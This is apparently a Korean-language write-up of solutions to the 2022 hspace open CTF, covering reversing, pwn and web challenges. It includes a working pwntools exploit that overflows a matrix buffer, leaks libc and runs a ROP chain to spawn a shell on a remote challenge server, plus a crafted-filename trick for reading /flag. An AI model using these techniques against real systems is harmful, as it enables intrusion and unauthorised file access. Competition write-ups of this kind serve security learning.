(CTF) 2022 hspace open CTF writeup
(REV)
Crack Space
MFC 로 만든 keygen 문제이다.
아마 2바이트인 유니코드를 사용하는데,
플레그 포멧 안에 있는 글자의 길이는 31 이고,
0 부터 31까지 반복문을 돌면서
i 가 홀수 → 해당 인덱스와 다른값이랑 xor
i 가 짝수 → 문자열 뒤집기
위와 같은 암호화를 진행한다.
[0, 15, 0, 2, 0, 13, 0, 4, 0, 11, 0, 6, 0, 9, 0, 8, 0, 7, 0, 10, 0, 5, 0, 12, 0, 3, 0, 14, 0, 1, 0]
이 순서로 암호화 되는데, 띄엄띄엄 암호화된다. ㅋㅋ
뒤에서나 앞에서나 돌면서 똑같이 한 번 더 xor 해주면 풀린다.
solve.py
from pwn import u32
cmp = [0x53, 0x0, 0x0, 0x0, 0xa5, 0x0, 0x0, 0x0, 0x6d, 0x0, 0x0, 0x0, 0xde, 0x0, 0x0, 0x0, 0x6c, 0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x5f, 0x0, 0x0, 0x0, 0x8d, 0x0, 0x0, 0x0, 0x65, 0x0, 0x0, 0x0, 0x44, 0x0, 0x0, 0x0, 0x67, 0x0, 0x0, 0x0, 0xcc, 0x0, 0x0, 0x0, 0x6e, 0x0, 0x0, 0x0, 0x19, 0x0, 0x0, 0x0, 0x62, 0x0, 0x0, 0x0, 0x25, 0x0, 0x0,
0x0, 0x70, 0x0, 0x0, 0x0, 0x77, 0x0, 0x0, 0x0, 0x73, 0x0, 0x0, 0x0, 0x65, 0x0, 0x0, 0x0, 0x5f, 0x0, 0x0, 0x0, 0x17, 0x0, 0x0, 0x0, 0x30, 0x0, 0x0, 0x0, 0x67, 0x0, 0x0, 0x0, 0x64, 0x0, 0x0, 0x0, 0xbb, 0x0, 0x0, 0x0, 0x4a, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x62, 0x0, 0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x29, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0]
cmp = [cmp[4*x] for x in range(len(cmp)//4)][:-1]
box = [0xd1, 0x95, 0x0, 0x0, 0x16, 0x6d, 0x0, 0x0, 0x65, 0x9d, 0x0, 0x0, 0x56, 0xb3, 0x0, 0x0, 0x65, 0xd7, 0x0, 0x0, 0x11, 0x1, 0x0, 0x0, 0x5c, 0x5c, 0x0, 0x0, 0x30, 0xa3, 0x0, 0x0, 0x48, 0x1d, 0x0, 0x0, 0xa9, 0x62, 0x0, 0x0, 0x47, 0xc5, 0x0, 0x0, 0xc3, 0x7c, 0x0, 0x0, 0xa3, 0x90, 0x0, 0x0, 0x27, 0x73, 0x0, 0x0, 0x7c, 0xf1, 0x0, 0x0, 0xcc,
0x6b, 0x0, 0x0, 0x3c, 0x9f, 0x0, 0x0, 0x1a, 0xd7, 0x0, 0x0, 0x28, 0xdb, 0x0, 0x0, 0xe7, 0x3c, 0x0, 0x0, 0x9, 0xa2, 0x0, 0x0, 0x39, 0xb1, 0x0, 0x0, 0xf7, 0x94, 0x0, 0x0, 0x70, 0xf6, 0x0, 0x0, 0xef, 0x8a, 0x0, 0x0, 0xe4, 0xa7, 0x0, 0x0, 0xc5, 0x6b, 0x0, 0x0, 0xcd, 0x4e, 0x0, 0x0, 0x82, 0xab, 0x0, 0x0, 0x16, 0xed, 0x0, 0x0, 0xaf, 0x95, 0x0, 0x0]
box = list(map(lambda x: u32(bytes(box[x:x+4])), range(0, 124, 4)))
print(box)
for i in range(30, -1, -1):
if i % 2 == 0:
cmp = cmp[::-1]
else:
cmp[i] ^= box[i] >> 15 ^ box[box[i] % 0x1f]
cmp[i] &= 0xff
print(cmp)
print("".join(list(map(chr, cmp))))
print(len(box))
self
흠..
입력한 문자열을 5글자씩 가져와서 이 입력값을 바탕으로 쉬프트연산 한 뒤 각각의 인덱스를 만든다. 입력한 문자열 전체에 대해 해당 인덱스 8개에 해당하는 값들을 ptr 에 집어넣는다.
플레그가 32바이트니까 7번 반복한다.
flag prefix (hspace{
) 를 알고있으니,
먼저 이 값을 바탕으로 인덱스를 구해 ptr 의 8글자를 원래 인덱스로 돌려놓는다.
그리고 그 값을 바탕으로 이 과정을 반복한다.
hspace{||||7h1rty|w0|1th_f|4g}”
그러면 | 를 제외한 나머지 플래그를 어느정도 복구할 수 있다.
f|4g → f14g, fl4g
, 내가 문제를 내도 fl4g 라고 할 것 같아서 게싱
|1th -> w1th
, w 으로 게싱
7h1rty|w0 -> 7h1rtytw0
, 약간 긴가민가 했는데 2022년이니까 t 로 게싱해서
hspace{||||_7h1rtytw0_w1th_fl4g}”
최종적으로 나온 플레그는 위와 같다.
md5 해시가 주어지니 그걸 바탕으로 4바이트 브루트포스 하면 다음의 플레그가 나온다.
hspace{b453_7h1rtytw0_w1th_fl4g}
solve.py
import string
from hashlib import md5
flag = b"""hsh1ht_a
7_4wchs_
{hrw1_sy
15_bt4a1
{sr117_0
hsrw7fs0
74gt""".split(b"\n")
print(flag)
tmp = 5
def _1209(x, y): return x << (~y+1) if y < 0 else x >> y
# = b"hspace{abcdefghijklmnopqrstuvwxyz}"
# 0 0 1 1 2 3 3 4
# f = [0xff]*32
# f[0] = ord("h")
# f[1] = ord("s")
# f[2] = ord("p")
# f[3] = ord("a")
# f[4] = ord("c")
# f[5] = ord("e")
# f[6] = ord("{")
# f[31] = ord("}")
# for k in range(7):
# if k == 6:
# tmp = 2
# for i in range(8):
# v8 = 5*i//8
# v9 = 3-5*i % 8
# if v8 >= tmp:
# break
# if f[v8+5*k] != 0xff:
# v6 = _1209(f[v8+5*k], v9)
# if v9 < 0 and v8 < tmp-1:
# if f[v8+5*k] == 0xff:
# continue
# v6 |= _1209(f[v8+5*k+1], v9+8)
# print(f"flag[{v8}] ({chr(f[v8+5*k])}), {v6}")
# if f[v6 & 0x1f] == 0xff:
# print(f"{chr(flag[k][i])} to flag[{v6&0x1f}]")
# f[v6 & 0x1f] = flag[k][i]
# print(''.join(list(map(chr, f))))
# print(f)
flag_hash = "7d8c56232a5ec1cea022d7ea2ce658d4"
flag = b"hspace{||||_7h1rtytw0_w1th_fl4g}"
s = string.printable[:-3]
s = s.encode()
for i in s:
for j in s:
for k in s:
for l in s:
if md5(flag[:7]+bytes([i, j, k, l])+flag[11:]).hexdigest() == flag_hash:
print(flag[:7]+bytes([i, j, k, l])+flag[11:])
exit(0)
# hspace{b453_7h1rtytw0_w1th_fl4g}
SEA
# .zsh_history : 1642261864:0;python3 main.py **FIND_THE_FLAG** 1337
여기에 이렇게 seed 값이 적혀있다.
그래서 AES key, iv 를 구할 수 있고, ror, rol 몇 번 했는지 알 수 있다.
solve.py
# .zsh_history : 1642261864:0;python3 main.py **FIND_THE_FLAG** 1337
import binascii
import sys
import base64
import random
import string
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import bitstring
def push(data):
data.rol(1)
return data
def pop(data):
data.ror(1)
return data
def custom_choice(length):
words = string.printable
res = ''
for _ in range(length):
res += random.choice(words)
return res
def custom_number(boundary1, boundary2):
return random.randint(boundary1, boundary2)
if __name__ == "__main__":
seed = 1337
random.seed(1337)
key = custom_choice(32).encode()
iv = custom_choice(16).encode()
print(key)
print(iv)
in_cipher = bitstring.BitArray(
hex='0x'+'f52d3924c5a5551d99ddbd48c8e11955d8e1e55519e4d0e5892db1556599d5e9d5ad95e904d551e9393925bc')
r1 = custom_number(5, 15)
r2 = custom_number(6, 15)
for j in range(1, r2):
in_cipher = push(in_cipher)
for i in range(1, r1):
in_cipher = pop(in_cipher)
print(AES.new(key, AES.MODE_CBC, iv).decrypt(
base64.b64decode(binascii.unhexlify(str(in_cipher)[2:]))))
(PWN)
matrix
보호기법은 canary, pie 정도 걸려있다.
원하는 사이즈 만큼의 N*N 행렬을 입력받고, 백터와 곱한 뒤 행렬곱을 출력해준다.
사이즈에 제한은 없으나, 버퍼는 64*64 으로 선언되어있으니,
사이즈에 65 를 입력하고
rbp-0x8018 + 512*i + 8*j
위 식으로 canary, return address 에 해당하는 offset 은 - 를 입력해 아무 값도 들어가지 않게 한다.
나머지는 0으로 채워준다.
canary 위치 : m[64][1]
ret 위치 : m[64][3]
백터에는 j 값이 3일 때만 1으로, 나머지는 0을 입력하면
return address 만 leak 된다.
이 후 다시 진행하여
m[64][3] 부터 ROP 해주면 쉘을 딸 수 있다.
ex.py
from pwn import *
import sys
if sys.argv.__len__() > 1:
r = remote("112.161.27.49", 30002)
else:
r = process("./matrix")
context.log_level = 'debug'
r.sendlineafter("Size: ", "65")
for j in range(65):
for i in range(65):
if j == 64 and i == 3:
r.sendlineafter(" = ", "-")
elif j == 64 and i == 1:
r.sendlineafter(" = ", "-")
else:
r.sendlineafter(" = ", "0")
for j in range(65):
if j == 3:
r.sendlineafter(" = ", "1")
else:
r.sendlineafter(" = ", "0")
r.recvuntil("Result: ")
base = int(r.recvline().split()[-2])-0x0270b3
prdi = 0x0000000000026b72+base
system = 0x055410+base
binsh = 0x1b75aa+base
log.info(hex(base))
r.sendlineafter("[y/N] ", "y")
r.sendlineafter("Size: ", "65")
for j in range(65):
for i in range(65):
if j == 64 and i == 3:
r.sendlineafter(" = ", str(prdi))
elif j == 64 and i == 4:
r.sendlineafter(" = ", str(binsh))
elif j == 64 and i == 5:
r.sendlineafter(" = ", str(prdi+1))
elif j == 64 and i == 6:
r.sendlineafter(" = ", str(system))
elif j == 64 and i == 1:
r.sendlineafter(" = ", "-")
else:
r.sendlineafter(" = ", "0")
for j in range(65):
if j == 3:
r.sendlineafter(" = ", "1")
else:
r.sendlineafter(" = ", "0")
r.recvuntil("Result: ")
r.recvline()
r.sendlineafter("[y/N] ", "N")
r.interactive()
(WEB)
babyphp
https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
memo
닉네임을 ㅁㄴㅇㄹ 으로 하고 title 에 없는 파일인 ㅁㄴㅇㄹf 을 넘겨주면 위와 같은 오류가 뜬다.
파일명은 base64 encoding 돼서 저장된다.
닉네임을 빈칸으로 가입하고, title 에 base64 인코딩했을 때 flag 라고 뜨는 ~V%a0
를 입력해주면
/flag
파일을 읽을 수 있다.